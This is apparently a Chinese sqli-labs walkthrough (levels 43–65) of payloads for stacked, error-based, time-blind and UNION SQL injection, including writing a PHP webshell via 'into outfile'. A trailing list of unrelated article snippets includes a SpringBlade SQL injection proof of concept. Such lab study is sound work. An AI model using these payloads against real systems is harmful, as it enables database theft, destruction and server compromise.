login_user=a&login_password=s'); create table ck #

login_user=a&login_password=s'); drop table ck #

Less-44

与Less-42类似。只是没有报错信息

login_user=a&login_password=s'; create table ck #

login_user=a&login_password=s'; drop table ck #

Less-45

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

password被(' ')包裹

login_user=a&login_password=s'); create table ck #

login_user=a&login_password=s'); drop table ck #

堆叠注入的危害

1.需要写权限

2.一句话木马

3.select xxx into outfile xxx

4.绝对路径 D:\phpStudy\PHPTutorial\WWW

构造：

select '' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\pass.php'

进行注入

s');select '' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\pass.php'; #

补充知识

SQL语句中，asc是指定列按升序排列，desc则是指定列按降序排列

select * from users order by 1 desc;

使用降序进行排序

select * from users order by 1 asc;

使用升序进行排序

Right() select right(database(),1);

Left() select left(database(),1);

lines terminated by xxx 以 xxx 为结尾

Less-46

sort=1

sort=2

sort=3

输出的表格内容不同，可以猜测sort值是列数，order by sort

sort=1 and 1=1 正确输出数据

说明存在注入点

采用报错注入

sort=1 and updatexml(1, concat(0x7e,(database())) ,1) --+

采用时间注入

sort=3 and if( ( length(database() )>15),1,sleep(5) ) --+

Less-47

sort=1'

报错，说明存在注入漏洞

sort=1' and '1'='1

使用 and or进行绕过

sort=1' and updatexml(1,concat( 0x7e,database() ),1) --+

使用的是报错注入

Less-48

本题没有报错信息，不能使用报错注入，只能用时间盲注。

与Less-46类似，sort没有被包裹

sort=1 --+

Less-49

sort=1' --+

与Less-48类似，只能用时间盲注

总结：

?id=

?sort=

select * from users where id=xxx

select * from users order by xxx

46-49 使用报错注入，时间盲注

select xxx into outfile ‘’

插入一句话木马

into outfile “文件地址” lines terminated by 一句话木马（转换为十六进制形式）

Less-50

sort没有被包裹

1.基于时间盲注

sort=1 and if((length(database())>8),1,sleep(5)) --+

2.基于报错注入

sort=1 and updatexml(1,concat(0x7e,database()),1) --+

3.写一句话木马

4.使用堆叠注入创建删除一个表

sort=1;create table ck like users; --+

sort=1;drop table ck; --+

5.使用堆叠注入写一句话木马

Less-51

sort=1' --+

由单引号' '包裹，其余步骤与Less-50相同

Less-52

sort=1 --+

本题没有报错信息

不能使用报错注入

Less-53

sort=1' --+

由单引号' '包裹，其余步骤与Less-52相同

本题没有报错信息

不能使用报错注入

Less-54

与其他题不同之处是只能注入10次

拿到flag提交

id=1' --+

进行绕过

id=1' order by 3 --+

查看有多少列数

id=1' union select 1,2,3 --+

查看哪些数据发生回显

id=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+

查看challenges数据库中的表

id=1' union select 1,2,group_concat(column_name) from information_columns where table_name='MSXXY5SBVJ'--+

查看MSXXY5SBVJ表中的列名

id=-1' union select 1,2,group_concat(secret_F28O) from challenges.MSXXY5SBVJ --+

得到secret_F28O字段的数据

Less-55

与Less-54类似，id由( )包裹

Less-56

与上题类似，id由(' ')包裹

Less-57

与上题类似，id由" "包裹

Less-58

id=-1' union select 1,2,3 --+却没有反应，对于联合查询，进行了过滤

使用报错注入

格式：updatexml(1,concat('~',(select database())),1)

id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+

查询表名

id=1' and updatexml(1,concat('~',(select group_concat(secret_YZKZ) from challenges.owhjnni3bp)),1) --+

得到字符串数据

Less-59

与Less-58类似，id无包裹，使用报错注入

Less-60

与上题类似，id由(" ")包裹，使用报错注入

Less-61

与上题类似，id由((' '))包裹

id=1')) and updatexml(1,(select concat('~',database())),1) --+

Less-62

id=1'判断是否存在注入点

却没有返回结果

这个测试次数，必然是时间盲注了。

id=1') and if(length(database())>10,1,sleep(5)) --+

首先判断数据库的长度

id=1') and if( left((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1)>'a',1,sleep(5)) --+

判断该表的第一位字母是不是比a大

id由(' ')包裹

Less-63

与上题类似

id由' '包裹

Less-64

与上题类似

id由(( ))包裹

Less-65

与上题类似

id由( )包裹

理解Gunicorn：Python WSGI服务器的基石范范0825 ipython linux 运维
理解Gunicorn：PythonWSGI服务器的基石介绍Gunicorn，全称GreenUnicorn，是一个为PythonWSGI（WebServerGatewayInterface）应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具，Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置，帮助初学者快速上手。1.什么是Gunico
mysql禁用远程登录 igotyback mysql
去mysql库中的user表里，将host都改成localhost之后刷新权限FLUSHPRIVILEGES;
Google earth studio 简介陟彼高冈yu 旅游
GoogleEarthStudio是一个基于Web的动画工具，专为创作使用GoogleEarth数据的动画和视频而设计。它利用了GoogleEarth强大的三维地图和卫星影像数据库，使用户能够轻松地创建逼真的地球动画、航拍视频和动态地图可视化。网址为https://www.google.com/earth/studio/。GoogleEarthStudio是一个基于Web的动画工具，专为创作使用G
PHP环境搭建详细教程好看资源平台前端 php
PHP是一个流行的服务器端脚本语言，广泛用于Web开发。为了使PHP能够在本地或服务器上运行，我们需要搭建一个合适的PHP环境。本教程将结合最新资料，介绍在不同操作系统上搭建PHP开发环境的多种方法，包括Windows、macOS和Linux系统的安装步骤，以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类：集成开发环境：例如XAMPP、WAMP、MAMP，这
关于提高复杂业务逻辑代码可读性的思考编程经验分享开发经验 java 数据库开发语言
目录前言需求场景常规写法拆分方法领域对象总结前言实际工作中大部分时间都是在写业务逻辑，一般都是三层架构，表示层（Controller）接收客户端请求，并对入参做检验，业务逻辑层（Service）负责处理业务逻辑，一般开发都是在这一层中写具体的业务逻辑。数据访问层（Dao）是直接和数据库交互的，用于查数据给业务逻辑层，或者是将业务逻辑层处理后的数据写入数据库。简单的增删改查接口不用多说，基本上写好一
SQL Server_查询某一数据库中的所有表的内容 qq_42772833 SQL Server 数据库 sqlserver
1.查看所有表的表名要列出CrabFarmDB数据库中的所有表（名），可以使用以下SQL语句：USECrabFarmDB;--切换到目标数据库GOSELECTTABLE_NAMEFROMINFORMATION_SCHEMA.TABLESWHERETABLE_TYPE='BASETABLE';对这段SQL脚本的解释：SELECTTABLE_NAME：这个语句的作用是从查询结果中选择TABLE_NAM
DIV+CSS+JavaScript技术制作网页（旅游主题网页设计与制作）云南大理 STU学生网页设计网页设计期末网页作业 html静态网页 html5期末大作业网页设计 web大作业
️精彩专栏推荐作者主页:【进入主页—获取更多源码】web前端期末大作业：【HTML5网页期末作业(1000套)】程序员有趣的告白方式：【HTML七夕情人节表白网页制作(110套)】文章目录二、网站介绍三、网站效果▶️1.视频演示2.图片演示四、网站代码HTML结构代码CSS样式代码五、更多源码二、网站介绍网站布局方面：计划采用目前主流的、能兼容各大主流浏览器、显示效果稳定的浮动网页布局结构。网站程
深入理解 MultiQueryRetriever：提升向量数据库检索效果的强大工具 nseejrukjhad 数据库 python
深入理解MultiQueryRetriever：提升向量数据库检索效果的强大工具引言在人工智能和自然语言处理领域，高效准确的信息检索一直是一个关键挑战。传统的基于距离的向量数据库检索方法虽然广泛应用，但仍存在一些局限性。本文将介绍一种创新的解决方案：MultiQueryRetriever，它通过自动生成多个查询视角来增强检索效果，提高结果的相关性和多样性。MultiQueryRetriever的工
关于城市旅游的HTML网页设计——(旅游风景云南 5页)HTML+CSS+JavaScript 二挡起步 web前端期末大作业 javascript html css 旅游风景
⛵源码获取文末联系✈Web前端开发技术描述网页设计题材，DIV+CSS布局制作,HTML+CSS网页设计期末课程大作业|游景点介绍|旅游风景区|家乡介绍|等网站的设计与制作|HTML期末大学生网页设计作业，Web大学生网页HTML：结构CSS：样式在操作方面上运用了html5和css3，采用了div+css结构、表单、超链接、浮动、绝对定位、相对定位、字体样式、引用视频等基础知识JavaScrip
HTML网页设计制作大作业（div+css）云南我的家乡旅游景点带文字滚动二挡起步 web前端期末大作业 web设计网页规划与设计 html css javascript dreamweaver 前端
Web前端开发技术描述网页设计题材，DIV+CSS布局制作,HTML+CSS网页设计期末课程大作业游景点介绍|旅游风景区|家乡介绍|等网站的设计与制作HTML期末大学生网页设计作业HTML：结构CSS：样式在操作方面上运用了html5和css3，采用了div+css结构、表单、超链接、浮动、绝对定位、相对定位、字体样式、引用视频等基础知识JavaScript：做与用户的交互行为文章目录前端学习路线
git - Webhook让部署自动化大猪大猪
我们现在有一个需求，将项目打包上传到gitlab或者github后，程序能自动部署，不用手动地去服务器中进行项目更新并运行，如何做到？这里我们可以使用gitlab与github的挂钩，挂钩的原理就是，每当我们有请求到gitlab与github服务器时，这时他俩会根据我们配置的挂钩地扯进行访问，webhook挂钩程序会一直监听着某个端口请求，一但收到他们发过来的请求，这时就知道用户有请求提交了，这时
MYSQL面试系列-04 king01299 面试 mysql 面试
MYSQL面试系列-0417.关于redolog和binlog的刷盘机制、redolog、undolog作用、GTID是做什么的？innodb_flush_log_at_trx_commit及sync_binlog参数意义双117.1innodb_flush_log_at_trx_commit该变量定义了InnoDB在每次事务提交时，如何处理未刷入（flush）的重做日志信息（redolog）。它
MongoDB Oplog 窗口喝醉酒的小白 MongoDB 运维
在MongoDB中，oplog（操作日志）是一个特殊的日志系统，用于记录对数据库的所有写操作。oplog允许副本集成员（通常是从节点）应用主节点上已经执行的操作，从而保持数据的一致性。它是MongoDB副本集实现数据复制的基础。MongoDBOplog窗口oplog窗口是指在MongoDB副本集中，从节点可以用来同步数据的时间范围。这个窗口通常由以下因素决定：Oplog大小：oplog的大小是有限
webpack图片等资源的处理 dmengmeng
需要的loaderfile-loader（让我们可以引入这些资源文件）url-loader（其实是file-loader的二次封装）img-loader（处理图片所需要的）在没有使用任何处理图片的loader之前，比如说css中用到了背景图片，那么最后打包会报错的，因为他没办法处理图片。其实你只想能够使用图片的话。只加一个file-loader就可以，打开网页能准确看到图片。{test:/\.(p
python os 环境变量 CV矿工 python 开发语言 numpy
环境变量：环境变量是程序和操作系统之间的通信方式。有些字符不宜明文写进代码里，比如数据库密码，个人账户密码，如果写进自己本机的环境变量里，程序用的时候通过os.environ.get（）取出来就行了。os.environ是一个环境变量的字典。环境变量的相关操作importos"""设置/修改环境变量：os.environ[‘环境变量名称’]=‘环境变量值’#其中key和value均为string类
【PG】常见数据库、表属性设置江无羡数据库
PG的常见属性配置方法数据库复制、备份相关表的复制标识单表操作批量表操作链接数据库复制、备份相关表的复制标识单表操作通过ALTER语句单独更改一张表的复制标识。ALTERTABLE[tablename]REPLICAIDENTITYFULL;批量表操作通过代码块的方式，对某个schema中的所有表一起更新其复制标识。SELECTtablename,CASErelreplidentWHEN'd'TH
nosql数据库技术与应用知识点皆过客，揽星河 NoSQL nosql 数据库大数据数据分析数据结构非关系型数据库
Nosql知识回顾大数据处理流程数据采集(flume、爬虫、传感器)数据存储(本门课程NoSQL所处的阶段)Hdfs、MongoDB、HBase等数据清洗(入仓)Hive等数据处理、分析(Spark、Flink等)数据可视化数据挖掘、机器学习应用(Python、SparkMLlib等)大数据时代存储的挑战(三高)高并发(同一时间很多人访问)高扩展(要求随时根据需求扩展存储)高效率(要求读写速度快)
SpringBlade dict-biz/list 接口 SQL 注入漏洞文章永久免费只为良心 oracle 数据库
SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中，如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询（PreparedSta
insert into select 主键自增_mybatis拦截器实现主键自动生成 weixin_39521651 insert into select 主键自增 mybatis delete返回值 mybatis insert返回主键 mybatis insert返回对象 mybatis plus insert返回主键 mybatis plus 插入生成id
前言前阵子和朋友聊天，他说他们项目有个需求，要实现主键自动生成，不想每次新增的时候，都手动设置主键。于是我就问他，那你们数据库表设置主键自动递增不就得了。他的回答是他们项目目前的id都是采用雪花算法来生成，因此为了项目稳定性，不会切换id的生成方式。朋友问我有没有什么实现思路，他们公司的orm框架是mybatis，我就建议他说，不然让你老大把mybatis切换成mybatis-plus。mybat
关于Mysql 中 Row size too large (＞ 8126) 错误的解决和理解秋刀prince mysql mysql 数据库
提示：啰嗦一嘴，数据库的任何操作和验证前，一定要记得先备份！！！不会有错；文章目录问题发现一、问题导致的可能原因1、页大小2、行格式2.1compact格式2.2Redundant格式2.3Dynamic格式2.4Compressed格式3、BLOB和TEXT列二、解决办法1、修改页大小（不推荐）2、修改行格式3、修改数据类型为BLOB和TEXT列4、其他优化方式（可以参考使用）4.1合理设置数据
「豆包Marscode体验官」 | 云端 IDE 启动 & Rust 体验张风捷特烈 ide rust 开发语言后端
theme:cyanosis我正在参加「豆包MarsCode初体验」征文活动MarsCode可以看作一个运行在服务端的远程VSCode开发环境。对于我这种想要学习体验某些语言，但不想在电脑里装环境的人来说非常友好。本文就来介绍一下在MarsCode里，我的体验rust开发体验。一、MarsCode是什么它的本质是:提供代码助手和云端IDE服务的web网站，可通过下面的链接访问https://www
Python神器！WEB自动化测试集成工具 DrissionPage 亚丁号 python 开发语言
一、前言用requests做数据采集面对要登录的网站时，要分析数据包、JS源码，构造复杂的请求，往往还要应付验证码、JS混淆、签名参数等反爬手段，门槛较高。若数据是由JS计算生成的，还须重现计算过程，体验不好，开发效率不高。使用浏览器，可以很大程度上绕过这些坑，但浏览器运行效率不高。因此，这个库设计初衷，是将它们合而为一，能够在不同须要时切换相应模式，并提供一种人性化的使用方法，提高开发和运行效率
Java爬虫框架（一）--架构设计狼图腾-狼之传说 java 框架 java 任务 html解析器存储电子商务
一、架构图那里搜网络爬虫框架主要针对电子商务网站进行数据爬取，分析，存储，索引。爬虫：爬虫负责爬取，解析，处理电子商务网站的网页的内容数据库：存储商品信息索引：商品的全文搜索索引Task队列：需要爬取的网页列表Visited表：已经爬取过的网页列表爬虫监控平台：web平台可以启动，停止爬虫，管理爬虫，task队列，visited表。二、爬虫1.流程1)Scheduler启动爬虫器，TaskMast
Java：爬虫框架 dingcho Java java 爬虫
一、ApacheNutch2【参考地址】Nutch是一个开源Java实现的搜索引擎。它提供了我们运行自己的搜索引擎所需的全部工具。包括全文搜索和Web爬虫。Nutch致力于让每个人能很容易,同时花费很少就可以配置世界一流的Web搜索引擎.为了完成这一宏伟的目标,Nutch必须能够做到:每个月取几十亿网页为这些网页维护一个索引对索引文件进行每秒上千次的搜索提供高质量的搜索结果简单来说Nutch支持分
MongoDB知识概括 GeorgeLin98 持久层 mongodb
MongoDB知识概括MongoDB相关概念单机部署基本常用命令索引-IndexSpirngDataMongoDB集成副本集分片集群安全认证MongoDB相关概念业务应用场景：传统的关系型数据库（如MySQL），在数据操作的“三高”需求以及应对Web2.0的网站需求面前，显得力不从心。解释：“三高”需求：①Highperformance-对数据库高并发读写的需求。②HugeStorage-对海量数
Mongodb Error: queryTxt ETIMEOUT xxxx.wwwdz.mongodb.net 佛一脚 error react mongodb 数据库
背景每天都能遇到奇怪的问题，做个记录，以便有缘人能得到帮助！换了一台电脑开发nextjs程序。需要连接mongodb数据，对数据进行增删改查。上一台电脑好好的程序，新电脑死活连不上mongodb数据库。同一套代码，没任何修改，搞得我怀疑人生了，打开浏览器进入mongodb官网毫无问题，也能进入线上系统查看数据，网络应该是没问题。于是我尝试了一下手机热点，这次代码能正常跑起来，连接数据库了！！！是不
JAVA·一个简单的登录窗口 MortalTom java 开发语言学习
文章目录概要整体架构流程技术名词解释技术细节资源概要JavaSwing是Java基础类库的一部分，主要用于开发图形用户界面（GUI）程序整体架构流程新建项目，导入sql.jar包（链接放在了文末），编译项目并运行技术名词解释一、特点丰富的组件提供了多种可视化组件，如按钮（JButton）、文本框（JTextField）、标签（JLabel）、下拉列表（JComboBox）等，可以满足不同的界面设计
Python实现下载当前年份的谷歌影像 sand&wich python 开发语言
在GIS项目和地图应用中，获取最新的地理影像数据是非常重要的。本文将介绍如何使用Python代码从Google地图自动下载当前年份的影像数据，并将其保存为高分辨率的TIFF格式文件。这个过程涉及地理坐标转换、多线程下载和图像处理。关键功能该脚本的核心功能包括：坐标转换：支持WGS-84与WebMercator投影之间转换，以及处理中国GCJ-02偏移。自动化下载：多线程下载地图瓦片，提高效率。图像
Spring MVC 全面指南：从入门到精通的详细解析一杯梅子酱技术栈学习 spring mvc java
引言：SpringMVC，作为Spring框架的一个重要模块，为构建Web应用提供了强大的功能和灵活性。无论是初学者还是有一定经验的开发者，掌握SpringMVC都将显著提升你的Web开发技能。本文旨在为初学者提供一个全面且易于理解的学习路径，通过详细的知识点分析和实际案例，帮助你快速上手SpringMVC，让学习过程既深刻又高效。一、SpringMVC简介1.1什么是SpringMVC？Spri
入门MySQL——查询语法练习 K_un
前言：前面几篇文章为大家介绍了DML以及DDL语句的使用方法，本篇文章将主要讲述常用的查询语法。其实MySQL官网给出了多个示例数据库供大家实用查询，下面我们以最常用的员工示例数据库为准，详细介绍各自常用的查询语法。1.员工示例数据库导入官方文档员工示例数据库介绍及下载链接：https://dev.mysql.com/doc/employee/en/employees-installation.h
深入浅出Java Annotation(元注解和自定义注解） Josh_Persistence Java Annotation 元注解自定义注解
一、基本概述　　 Annontation是Java5开始引入的新特征。中文名称一般叫注解。它提供了一种安全的类似注释的机制，用来将任何的信息或元数据（metadata）与程序元素（类、方法、成员变量等）进行关联。　　更通俗的意思是为程序的元素（类、方法、成员变量）加上更直观更明了的说明，这些说明信息是与程序的业务逻辑无关，并且是供指定的工具或
mysql优化特定类型的查询 annan211 java 工作 mysql
本节所介绍的查询优化的技巧都是和特定版本相关的，所以对于未来mysql的版本未必适用。 1 优化count查询对于count这个函数的网上的大部分资料都是错误的或者是理解的都是一知半解的。在做优化之前我们先来看看真正的count()函数的作用到底是什么。 count()是一个特殊的函数，有两种非常不同的作用，他可以统计某个列值的数量，也可以统计行数。在统
MAC下安装多版本JDK和切换几种方式棋子chessman jdk
环境： MAC AIR,OS X 10.10,64位历史：过去 Mac 上的 Java 都是由 Apple 自己提供，只支持到 Java 6，并且OS X 10.7 开始系统并不自带（而是可选安装）（原自带的是1.6）。后来 Apple 加入 OpenJDK 继续支持 Java 6，而 Java 7 将由 Oracle 负责提供。在终端中输入jav
javaScript （1） Array_06 JavaScript java 浏览器
JavaScript 1、运算符　　运算符就是完成操作的一系列符号，它有七类：　　赋值运算符（=,+=,-=,*=,/=,%=,<<=,>>=,|=,&=）、算术运算符(+,-,*,/,++,--,%)、比较运算符(>,<,<=,>=,==,===,!=,!==)、逻辑运算符(||,&&,!)、条件运算(?:)、位
国内顶级代码分享网站袁潇含 java jdk oracle .net PHP
现在国内很多开源网站感觉都是为了利益而做的当然利益是肯定的,否则谁也不会免费的去做网站 &
Elasticsearch、MongoDB和Hadoop比较随意而生 mongodb hadoop 搜索引擎
IT界在过去几年中出现了一个有趣的现象。很多新的技术出现并立即拥抱了“大数据”。稍微老一点的技术也会将大数据添进自己的特性，避免落大部队太远，我们看到了不同技术之间的边际的模糊化。假如你有诸如Elasticsearch或者Solr这样的搜索引擎，它们存储着JSON文档，MongoDB存着JSON文档，或者一堆JSON文档存放在一个Hadoop集群的HDFS中。你可以使用这三种配
mac os 系统科研软件总结张亚雄 mac os
1.1 Microsoft Office for Mac 2011 大客户版，自行搜索。 1.2 Latex （MacTex）: 系统环境：https://tug.org/mactex/ &nb
Maven实战（四）生命周期 AdyZhang maven
1. 三套生命周期 Maven拥有三套相互独立的生命周期，它们分别为clean，default和site。每个生命周期包含一些阶段，这些阶段是有顺序的，并且后面的阶段依赖于前面的阶段，用户和Maven最直接的交互方式就是调用这些生命周期阶段。以clean生命周期为例，它包含的阶段有pre-clean, clean 和 post
Linux下Jenkins迁移 aijuans Jenkins
1. 将Jenkins程序目录copy过去源程序在/export/data/tomcatRoot/ofctest-jenkins.jd.com下面 tar -cvzf jenkins.tar.gz ofctest-jenkins.jd.com &
request.getInputStream()只能获取一次的问题 ayaoxinchao request Inputstream
问题：在使用HTTP协议实现应用间接口通信时，服务端读取客户端请求过来的数据，会用到request.getInputStream()，第一次读取的时候可以读取到数据，但是接下来的读取操作都读取不到数据原因： 1. 一个InputStream对象在被读取完成后，将无法被再次读取，始终返回-1； 2. InputStream并没有实现reset方法（可以重
数据库SQL优化大总结之百万级数据库优化方案 BigBird2012 SQL优化
网上关于SQL优化的教程很多，但是比较杂乱。近日有空整理了一下，写出来跟大家分享一下，其中有错误和不足的地方，还请大家纠正补充。这篇文章我花费了大量的时间查找资料、修改、排版，希望大家阅读之后，感觉好的话推荐给更多的人，让更多的人看到、纠正以及补充。 1.对查询进行优化，要尽量避免全表扫描，首先应考虑在 where 及 order by 涉及的列上建立索引。 2.应尽量避免在 where
jsonObject的使用 bijian1013 java json
在项目中难免会用java处理json格式的数据，因此封装了一个JSONUtil工具类。 JSONUtil.java package com.bijian.json.study; import java.util.ArrayList; import java.util.Date; import java.util.HashMap;
[Zookeeper学习笔记之六]Zookeeper源代码分析之Zookeeper.WatchRegistration bit1129 zookeeper
Zookeeper类是Zookeeper提供给用户访问Zookeeper service的主要API，它包含了如下几个内部类首先分析它的内部类，从WatchRegistration开始，为指定的znode path注册一个Watcher， /** * Register a watcher for a particular p
【Scala十三】Scala核心七：部分应用函数 bit1129 scala
何为部分应用函数？ Partially applied function: A function that’s used in an expression and that misses some of its arguments.For instance, if function f has type Int => Int => Int, then f and f(1) are p
Tomcat Error listenerStart 终极大法 ronin47 tomcat
Tomcat报的错太含糊了，什么错都没报出来，只提示了Error listenerStart。为了调试，我们要获得更详细的日志。可以在WEB-INF/classes目录下新建一个文件叫logging.properties，内容如下 Java代码 handlers = org.apache.juli.FileHandler, java.util.logging.ConsoleHa
不用加减符号实现加减法 BrokenDreams 实现
今天有群友发了一个问题，要求不用加减符号(包括负号)来实现加减法。分析一下，先看最简单的情况，假设1+1，按二进制算的话结果是10，可以看到从右往左的第一位变为0，第二位由于进位变为1。
读《研磨设计模式》-代码笔记-状态模式-State bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ /* 当一个对象的内在状态改变时允许改变其行为，这个对象看起来像是改变了其类状态模式主要解决的是当控制一个对象状态的条件表达式过于复杂时的情况把状态的判断逻辑转移到表示不同状态的一系列类中，可以把复杂的判断逻辑简化如果在
CUDA程序block和thread超出硬件允许值时的异常 cherishLC CUDA
调用CUDA的核函数时指定block 和 thread大小，该大小可以是dim3类型的（三维数组），只用一维时可以是usigned int型的。以下程序验证了当block或thread大小超出硬件允许值时会产生异常！！！GPU根本不会执行运算！！！所以验证结果的正确性很重要！！！在VS中创建CUDA项目会有一个模板，里面有更详细的状态验证。以下程序在K5000GPU上跑的。
诡异的超长时间GC问题定位 chenchao051 jvm cms GC hbase swap
HBase的GC策略采用PawNew+CMS, 这是大众化的配置，ParNew经常会出现停顿时间特别长的情况，有时候甚至长到令人发指的地步，例如请看如下日志： 2012-10-17T05:54:54.293+0800: 739594.224: [GC 739606.508: [ParNew: 996800K->110720K(996800K), 178.8826900 secs] 3700
maven环境快速搭建 daizj 安装 mavne 环境配置
一下载maven 安装maven之前，要先安装jdk及配置JAVA_HOME环境变量。这个安装和配置java环境不用多说。 maven下载地址：http://maven.apache.org/download.html，目前最新的是这个apache-maven-3.2.5-bin.zip，然后解压在任意位置，最好地址中不要带中文字符，这个做java 的都知道，地址中出现中文会出现很多
PHP网站安全，避免PHP网站受到攻击的方法 dcj3sjt126com PHP
对于PHP网站安全主要存在这样几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgerie
yii中给CGridView设置默认的排序根据时间倒序的方法 dcj3sjt126com GridView
public function searchWithRelated() { $criteria = new CDbCriteria; $criteria->together = true; //without th
Java集合对象和数组对象的转换 dyy_gusi java集合
在开发中，我们经常需要将集合对象（List，Set）转换为数组对象，或者将数组对象转换为集合对象。Java提供了相互转换的工具，但是我们使用的时候需要注意，不能乱用滥用。 1、数组对象转换为集合对象最暴力的方式是new一个集合对象，然后遍历数组，依次将数组中的元素放入到新的集合中，但是这样做显然过
nginx同一主机部署多个应用 geeksun nginx
近日有一需求，需要在一台主机上用nginx部署2个php应用，分别是wordpress和wiki，探索了半天，终于部署好了，下面把过程记录下来。 1. 在nginx下创建vhosts目录，用以放置vhost文件。 mkdir vhosts 2. 修改nginx.conf的配置，在http节点增加下面内容设置，用来包含vhosts里的配置文件 #
ubuntu添加admin权限的用户账号 hongtoushizi ubuntu useradd
ubuntu创建账号的方式通常用到两种：useradd 和adduser . 本人尝试了useradd方法，步骤如下： 1:useradd 使用useradd时，如果后面不加任何参数的话，如：sudo useradd sysadm 创建出来的用户将是默认的三无用户：无home directory ,无密码,无系统shell。顾应该如下操作：
第五章常用Lua开发库2-JSON库、编码转换、字符串处理 jinnianshilongnian nginx lua
JSON库在进行数据传输时JSON格式目前应用广泛，因此从Lua对象与JSON字符串之间相互转换是一个非常常见的功能；目前Lua也有几个JSON库，本人用过cjson、dkjson。其中cjson的语法严格（比如unicode \u0020\u7eaf），要求符合规范否则会解析失败（如\u002），而dkjson相对宽松，当然也可以通过修改cjson的源码来完成
Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解 yaerfeng1989 timer quartz 定时器
原创整理不易，转载请注明出处：Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解代码下载地址：http://www.zuidaima.com/share/1772648445103104.htm 有两种流行Spring定时器配置：Java的Timer类和OpenSymphony的Quartz。 1.Java Timer定时首先继承jav
Linux下df与du两个命令的差别？ pda158 linux
　一、df显示文件系统的使用情况，与du比較，就是更全盘化。　　最经常使用的就是 df -T，显示文件系统的使用情况并显示文件系统的类型。　　举比例如以下：　　[root@localhost ~]# df -T 　　Filesystem Type &n
[转]SQLite的工具类 ---- 通过反射把Cursor封装到VO对象 ctfzh VO android sqlite 反射 Cursor
在写DAO层时，觉得从Cursor里一个一个的取出字段值再装到VO(值对象)里太麻烦了，就写了一个工具类，用到了反射，可以把查询记录的值装到对应的VO里，也可以生成该VO的List。使用时需要注意：考虑到Android的性能问题，VO没有使用Setter和Getter，而是直接用public的属性。表中的字段名需要和VO的属性名一样，要是不一样就得在查询的SQL中
该学习笔记用到的Employee表 vipbooks oracle sql 工作
这是我在学习Oracle是用到的Employee表，在该笔记中用到的就是这张表，大家可以用它来学习和练习。 drop table Employee; -- 员工信息表 create table Employee( -- 员工编号 EmpNo number(3) primary key, -- 姓